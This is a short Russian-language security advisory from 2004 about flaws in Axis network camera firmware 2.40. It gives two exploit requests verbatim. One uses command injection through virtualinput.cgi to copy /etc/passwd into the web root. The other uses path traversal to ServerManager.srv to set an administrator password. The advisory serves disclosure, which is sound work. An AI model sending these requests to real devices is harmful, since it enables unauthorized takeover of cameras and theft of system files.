Несколько уязвимостей в Axis network cameras
| Дата публикации: | 26.08.2004 |
| Всего просмотров: | 1296 |
| Опасность: | Высокая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Axis Network Cameras Firmware Version 2.40; Axis 2100/2110/2120/2420/2130 Network Camera, 2400/2401 Video Server
Описание: Несколько уязвимостей обнаружено в Axis network cameras. Удаленный пользователь может просматривать и редактировать файлы и получить административный доступ к целевой системе. 1. /axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/ httpd/html/passwd\x60 HTTP/1.12. POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0\nContent-Length: 250 Pragma: no-cache conf_Security_List=root%%3AADVO%%30t&checkAdmin=on&checkDial=on&ch eckView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables Пример/Эксплоит: Еще примеры см. в источнике сообщения. URL производителя: http://www.axis.com/products/video/camera/index.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | [Full-Disclosure] [PoC] Nasty bug(s) found in Axis Network Camera/Video Servers |